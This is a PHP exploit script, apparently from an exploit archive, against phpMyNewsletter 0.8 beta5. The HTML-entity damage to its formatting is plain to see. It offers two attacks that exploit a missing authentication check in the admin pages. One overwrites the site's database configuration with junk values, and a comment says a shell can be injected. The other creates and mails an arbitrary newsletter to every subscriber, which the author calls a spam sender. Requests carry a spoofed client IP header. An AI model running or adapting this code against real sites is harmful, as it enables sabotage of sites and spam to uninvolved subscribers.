phpMyNewsletter <= 0.8 (beta5) Multiple Vuln Exploit

                                                #!/usr/bin/php -q -d short_open_tag=on
<?
echo&nbsp;\"
phpMyNewsletter&nbsp;<=&nbsp;0.8&nbsp;(beta5)&nbsp;Multiple&nbsp;Vuln&nbsp;Exploit
by&nbsp;BlackHawk&nbsp;<[email protected]>&nbsp;<http://itablackhawk.altervista.org>
Thanks&nbsp;to&nbsp;rgod&nbsp;for&nbsp;the&nbsp;php&nbsp;code&nbsp;and&nbsp;Marty&nbsp;for&nbsp;the&nbsp;Love

\";
if&nbsp;($argc<3)&nbsp;{
echo&nbsp;\"Usage:&nbsp;php&nbsp;\".$argv[0].\"&nbsp;Site&nbsp;AttackType&nbsp;Related
Host:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;(ip/hostname)
Path:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;path&nbsp;of&nbsp;phpMyNewsletter
AttackType:&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;-&nbsp;>&nbsp;Delete&nbsp;Config&nbsp;Value&nbsp;(Rude&nbsp;Attack&nbsp;-&nbsp;can\'t&nbsp;do&nbsp;anything&nbsp;after)
			&nbsp;&nbsp;&nbsp;2&nbsp;-&nbsp;>&nbsp;Send&nbsp;an&nbsp;Email&nbsp;to&nbsp;all&nbsp;of&nbsp;the&nbsp;subscribers&nbsp;(Do&nbsp;not&nbsp;alter&nbsp;anything)
Related:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;-&nbsp;>&nbsp;None
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2&nbsp;-&nbsp;>&nbsp;OneWordTitle&nbsp;TextOfYourChoice
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Es:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;php&nbsp;\".$argv[0].\"&nbsp;localhost&nbsp;/myphpnl/&nbsp;Newsletter_Hacked&nbsp;BlackHawk&nbsp;Got&nbsp;Your&nbsp;Newsletter
\";
die;
}

/*
Attack&nbsp;N?
vuln&nbsp;code&nbsp;is&nbsp;in&nbsp;index.php:&nbsp;the&nbsp;function&nbsp;to&nbsp;ceck&nbsp;the&nbsp;login&nbsp;is&nbsp;at&nbsp;line&nbsp;79,
but&nbsp;the&nbsp;code&nbsp;to&nbsp;change&nbsp;the&nbsp;config&nbsp;file&nbsp;is&nbsp;at&nbsp;line&nbsp;33..
if&nbsp;mq=off&nbsp;you&nbsp;can&nbsp;inject&nbsp;a&nbsp;shell&nbsp;into&nbsp;the&nbsp;file..

Attack&nbsp;N?

vuln&nbsp;code&nbsp;is&nbsp;in&nbsp;send_mod.php&nbsp;at&nbsp;line&nbsp;16:

if(!checkAdminAccess($conf->admin_pass,&nbsp;$form_pass))
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;header(\"Location:index.php\");
	&nbsp;
this&nbsp;is&nbsp;not&nbsp;a&nbsp;protection,&nbsp;so&nbsp;we&nbsp;can&nbsp;send&nbsp;previously&nbsp;created&nbsp;newsletter..
but&nbsp;in&nbsp;the&nbsp;same&nbsp;file&nbsp;there&nbsp;is&nbsp;a&nbsp;function&nbsp;to&nbsp;add&nbsp;new-newsletters..
so&nbsp;here&nbsp;it&nbsp;is&nbsp;a&nbsp;perfect&nbsp;spam&nbsp;sender&nbsp;program..

BlackHawk&nbsp;<[email protected]>
*/
error_reporting(0);
ini_set(\"max_execution_time\",0);
ini_set(\"default_socket_timeout\",5);

function&nbsp;quick_dump($string)
{
&nbsp;&nbsp;$result=\'\';$exa=\'\';$cont=0;
&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=strlen($string)-1;&nbsp;$i++)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;if&nbsp;((ord($string[$i])&nbsp;<=&nbsp;32&nbsp;)&nbsp;|&nbsp;(ord($string[$i])&nbsp;>&nbsp;126&nbsp;))
&nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;.\";}
&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;\".$string[$i];}
&nbsp;&nbsp;&nbsp;if&nbsp;(strlen(dechex(ord($string[$i])))==2)
&nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;\".dechex(ord($string[$i]));}
&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;0\".dechex(ord($string[$i]));}
&nbsp;&nbsp;&nbsp;$cont++;if&nbsp;($cont==15)&nbsp;{$cont=0;&nbsp;$result.=\"
\";&nbsp;$exa.=\"
\";}
&nbsp;&nbsp;}
&nbsp;return&nbsp;$exa.\"
\".$result;
}
$proxy_regex&nbsp;=&nbsp;\'(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})\';
function&nbsp;sendpacketii($packet)
{
&nbsp;&nbsp;global&nbsp;$proxy,&nbsp;$host,&nbsp;$port,&nbsp;$html,&nbsp;$proxy_regex;
&nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen(gethostbyname($host),$port);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;\'.$host.\':\'.$port;&nbsp;die;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;{
	$c&nbsp;=&nbsp;preg_match($proxy_regex,$proxy);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$c)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'Not&nbsp;a&nbsp;valid&nbsp;proxy...\';die;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;$parts=explode(\':\',$proxy);
&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\"Connecting&nbsp;to&nbsp;\".$parts[0].\":\".$parts[1].\"&nbsp;proxy...
\";
&nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen($parts[0],$parts[1]);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;proxy...\';die;
	}
&nbsp;&nbsp;}
&nbsp;&nbsp;fputs($ock,$packet);
&nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$html=\'\';
&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;(!feof($ock))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fgets($ock);
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$html=\'\';
&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;((!feof($ock))&nbsp;or&nbsp;(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fread($ock,1);
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$attack_type=$argv[3];
$port=80;
$proxy=\"\";

if&nbsp;(($path[0]<>\'/\')&nbsp;or&nbsp;($path[strlen($path)-1]<>\'/\'))&nbsp;{echo&nbsp;\'Error...&nbsp;check&nbsp;the&nbsp;path!\';&nbsp;die;}
if&nbsp;($proxy==\'\')&nbsp;{$p=$path;}&nbsp;else&nbsp;{$p=\'http://\'.$host.\':\'.$port.$path;}


switch($attack_type)
{
case&nbsp;1:&nbsp;//Config.php&nbsp;values&nbsp;delete
echo&nbsp;\"&nbsp;-&nbsp;Executing&nbsp;Task..
\";
$data=\"file=1&db_host=hacked&db_login=hacked&db_pass=hacked&db_name=hacked&table_config=hacked\";
$packet=\"POST&nbsp;\".$p.\"admin/index.php?op=saveGlobalconfig&nbsp;HTTP/1.0
\";
$packet.=\"CLIENT-IP:&nbsp;999.999.999.999
\";//spoof
$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*&nbsp;/*
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"
\";
$packet.=\"Accept-Language:&nbsp;it
\";
$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
$packet.=\"Accept-Encoding:&nbsp;gzip,&nbsp;deflate
\";
$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;6.0;&nbsp;Windows&nbsp;NT&nbsp;5.1;&nbsp;SV1)
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Content-Length:&nbsp;\".strlen($data).\"
\";
$packet.=\"Connection:&nbsp;Close
\";
$packet.=\"Cache-Control:&nbsp;no-cache

\";
$packet.=$data;
sendpacketii($packet);
echo&nbsp;\"&nbsp;-&nbsp;All&nbsp;done..&nbsp;^_^
\";
break;

case&nbsp;2:&nbsp;//Send&nbsp;NewsLetter
$title=$argv[4];
$txt=\'\';
for&nbsp;($i=5;&nbsp;$i<=$argc-1;&nbsp;$i++){
$txt.=\"&nbsp;\".$argv[$i];
}
echo&nbsp;\"&nbsp;-&nbsp;Executing&nbsp;Task&nbsp;1&nbsp;(Creating&nbsp;Newsletter)
\";
$data=\"subject=\".urlencode($title.\'&nbsp;-&nbsp;Send&nbsp;With&nbsp;BlackHawk&nbsp;Exploit&nbsp;-\').\"&message=\".urlencode($txt.\'<br><br>&nbsp;-&nbsp;Send&nbsp;With&nbsp;BlackHawk&nbsp;Exploit&nbsp;-\').\"&format=html&list_id=1\";
$packet=\"POST&nbsp;\".$p.\"admin/send_mod.php&nbsp;HTTP/1.0
\";
$packet.=\"CLIENT-IP:&nbsp;999.999.999.999
\";//spoof
$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*&nbsp;/*
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"
\";
$packet.=\"Accept-Language:&nbsp;it
\";
$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
$packet.=\"Accept-Encoding:&nbsp;gzip,&nbsp;deflate
\";
$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;6.0;&nbsp;Windows&nbsp;NT&nbsp;5.1;&nbsp;SV1)
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Content-Length:&nbsp;\".strlen($data).\"
\";
$packet.=\"Connection:&nbsp;Close
\";
$packet.=\"Cache-Control:&nbsp;no-cache

\";
$packet.=$data;
sendpacketii($packet);
echo&nbsp;\"&nbsp;-&nbsp;Retrieving&nbsp;MsgID..
\";
$temp=&nbsp;explode(\'Location:&nbsp;\',&nbsp;$html);
$x&nbsp;=&nbsp;explode(\"
\",&nbsp;$temp[1]);
$url_msgid=$x[0];
echo&nbsp;\"&nbsp;-&nbsp;Sending&nbsp;The&nbsp;EMail..
\";

$packet=\"GET&nbsp;\".$p.\"admin/$url_msgid&nbsp;HTTP/1.0
\";
$packet.=\"CLIENT-IP:&nbsp;999.999.999.999
\";//spoof
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"
\";
$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;6.0;&nbsp;Windows&nbsp;NT&nbsp;5.1;&nbsp;SV1)
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close
\";
echo&nbsp;$packet;
sendpacketii($packet);
echo&nbsp;\"&nbsp;-&nbsp;Email&nbsp;Sent
\";
echo&nbsp;$html;
}
?>

&nbsp;